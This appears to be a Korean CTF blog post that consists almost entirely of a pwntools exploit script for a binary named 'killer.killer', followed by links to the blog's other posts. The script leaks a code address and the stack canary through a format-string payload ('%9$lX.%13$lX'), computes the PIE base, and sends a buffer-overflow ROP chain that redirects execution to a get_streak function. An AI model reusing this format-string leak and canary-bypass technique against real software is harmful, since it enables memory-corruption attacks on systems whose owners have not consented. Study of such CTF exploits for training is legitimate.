728x90
'''
$input = 6$
Address of init is in 9$
Canary is at 13$
Leaking in at init + Canary
%9$lX.%13$lX
'''
from pwn import *
context.binary = binary = ELF("./killer.killer")
p = process()
p.recvuntil(b"stroke?")
static_libc_csu_address = binary.symbols.__libc_csu_init
payload = b'%9$lX.%13$lX'
p.sendline(payload)
p.recvuntil(b"confront:")
output = p.recv().split(b"\n")[0]
dynamic_init_libc = int(output.split(b".")[0].strip(), 16)
canary = int(output.split(b".")[1].strip(), 16)
print("csu_init_adress is {}\n canary is {} ".format(hex(dynamic_init_libc), hex(canary)))
dynamic_base_address = dynamic_init_libc - static_libc_csu_address
binary.address = dynamic_base_address
dynamic_get_streak = binary.symbols.get_streak
rop = ROP(binary)
ret_gadget = rop.find_gadget(['ret'])[0]
payload = b"A"*0x18 + p64(canary) + b"B"*8 + p64(ret_gadget) + p64(dynamic_get_streak)
p.sendline(payload)
p.interactive()
728x90
'호그와트' 카테고리의 다른 글
| Hack the box Irked hello (0) | 2022.11.30 |
|---|---|
| 비 오는 날인데 전 하나 부쳐먹고 싶네요 그래서 바이너리를 구워먹었습니다 (0) | 2022.11.28 |
| 원더랜드에 오신 것을 환영합니다 (0) | 2022.11.21 |
| 어느 날에 누군가가 지은 따끈한 코드 한 사발 하실라우? (0) | 2022.11.19 |
| 제 주문은 콤비네이션인데요 (0) | 2022.11.18 |